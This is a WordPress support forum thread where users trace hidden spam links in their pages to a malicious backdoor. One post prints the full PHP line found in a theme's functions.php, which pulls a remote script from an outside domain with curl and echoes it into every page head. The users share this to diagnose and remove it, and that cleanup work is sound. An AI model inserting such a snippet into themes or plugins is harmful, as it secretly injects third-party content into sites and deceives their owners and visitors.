Un necessary care2.com links in my source file

I’d been interested about this too: I believe it’s a hack and I don’t understand how it happened. Someone else? I’m using wordpress 3.3.1 and I’ve tried to secure my page as good as possible (e.g. it’s being monitored by WebsiteDefender.com). Pretty annoying …

thanks, stefan

I think I found something: I had a plugin called “WordPress Database Backup” (https://www.wordpressconnect.net/wordpress-database-backup-plugin/) installed. After deactivating it those nasty spam-links have now disappeared from the site’s sourcecode.

^ I uninstalled it .. Still I have the links

I have the following plugins

Askimet
All in SEO
Get the image
Google XML Sitemaps
Image Mouseover
Login Lockdown
Page Links to
secure WordPress
Sexybookmarks
Superb Slideshow
Super Simple Google Analytics
WP Backup to dropbox
copy protect
minify
smush.it
super cache

I wish to get those links removed at the earliest ??

Sexybookmarks???

go to this forum’s startpage, type care2.com into the search-field (right below “Search the Support Forums”) – for me the second hit is a link to

Sexybookmarks

… funny, isn’t it? I can’t say for sure it’s this plugin that causes the troubles but I find it quite remarkable that the search yields a link to this particular plugin as second result (right after a link to your post).

What I would do: deactivate all plugins. See if the links still are in the webpage’s sourcode. If not, reactivate the plugins one after another. As soon as the links are back in the sourcode you know which plugin’s causing the troubles.

good luck, Stefan

the riddle’s answer:

it’s not your blog that’s been hacked nor is it my blog – wpstats.org has been hacked!

have a look: https://www.wpstats.org/jquery-1.6.3.min.js (look at the source-code of that webpage)

… this doesn’t look like jQuery, does it?

^ watz the solution ?

I want those adult links out of my code

kinda simple: make sure your wordpress-code doesn’t link to https://www.wpstats.org/jquery-1.6.3.min.js
very likely this will be the case within your plugins as they don’t necessarily rely on the existence of jQuery within wordpress (don’t know why – wordpress ships with jQuery anyway these days).

an even better fix would be if the wordpress-team would fix wpstats.org but that might take some time…

I have found the problem.

Check your installed theme “functions.php” for this line:

if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "https://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

For me, it was on line 3. Deleted the entire line, and…puff, no more sexy links in source code.

Hope this helps, it took us some days of searching through the files….

just once again:

the problem isn’t the code in your or in my site – it’s www.ads-software.com resp. https://www.wpstats.org/jquery-1.6.3.min.js

and the wordpress people don’t do anything about it :\

This is why I mentioned where the link to that file is, instead of waiting for someone else to fix this problem, I decided to fix it for myself. Google is indexing hidden divs, so…No more linked hacked scripts.

unfortunately it’s not only there… it can possibly be found in the sources of hundreds of plugins and, as your example demonstrates, also themes. whoever hacked wpstats.org (can’t believe it’s been the wordpress-team itself) knew exactly about the consequences.

btw: does anybody know how to notify the wordpress-team. i already sent them a message about that over twitter but they didn’t react. wpstats.org is in the current state for months now. don’t they know the site is hacked or do they not care?

and the wordpress people don’t do anything about it :\

wpstats.org is in the current state for months now. don’t they know the site is hacked or do they not care?

I don’t think you mean what you think you mean.

If the plugin you are referring to is hosted here and is doing dodgy things, please point out where that plugin is on https://www.ads-software.com/extend/plugins

You haven’t done that yet.

This one doesn’t have anything to do with WordPress despite the use of WordPress in their domain.

https://www.wordpressconnect.net/wordpress-database-backup-plugin/

That web site us doing something they must know they shouldn’t be doing.

https://www.ads-software.com/about/domains/

If you can provide a link on www.ads-software.com for a plugin that’s doing something dodgy, then that will make it easier to clean up.

BTW wpstats.org doesn’t look like it has anything to do with WordPress.

https://www.networksolutions.com/whois-search/wpstats.org

ok, i see was probably wrong assuming wpstats.org belongs to www.ads-software.com – calling https://wpstats.org only forwards to https://www.ads-software.com.

https://www.wordpressconnect.net/wordpress-database-backup-plugin/ is one of many plugins that links resp. embeds jQuery.js from https://www.wpstats.org/jquery-1.6.3.min.js (i’ve removed the call from the pugin’s code manually).

indeed, https://www.wordpressconnect.net/wordpress-database-backup-plugin/ doesn’t seem to be listed on https://www.ads-software.com/extend/plugins – i only remember very vaguely i installed after it was recommended from my blog’s dashboard (usually i’m looking for plugins on https://www.ads-software.com/extend/plugins and don’t go searching the web over google or the like). maybe i should try to contact someone https://www.wordpressconnect.net … anyway this isn’t the only plugin resp. theme that links to wpstats.org…

maybe i should try to contact someone

You could attempt to contact them, but here’s why I don’t think that will get you anywhere.

Their domain name contains “wordpress” in it. That’s a huge no-no.

But wait! There’s more! Their logo is a fairly blatant spin on Amazon’s logo.

Those same folks have another plugin in the WordPress repository. That plugin sound like it’s a little dodgy with embedding their own affiliate code into the plugin and having this explanation in the forum:

I see not harm in adding my affiliate code, specially when the user do have the option to disable it in the backend.

This may or may not be in the current version of the plugin, but it speaks volumes that they would consider making it opt-out instead of opt-in.

I do not know if putting in their own affiliate code is permitted in the WordPress repository or if it’s against the rules. But I do think it’s questionable behavior.

The fact that they also host a questionable plugin on their own site with dodgy code would make me avoid them and their software like the plague.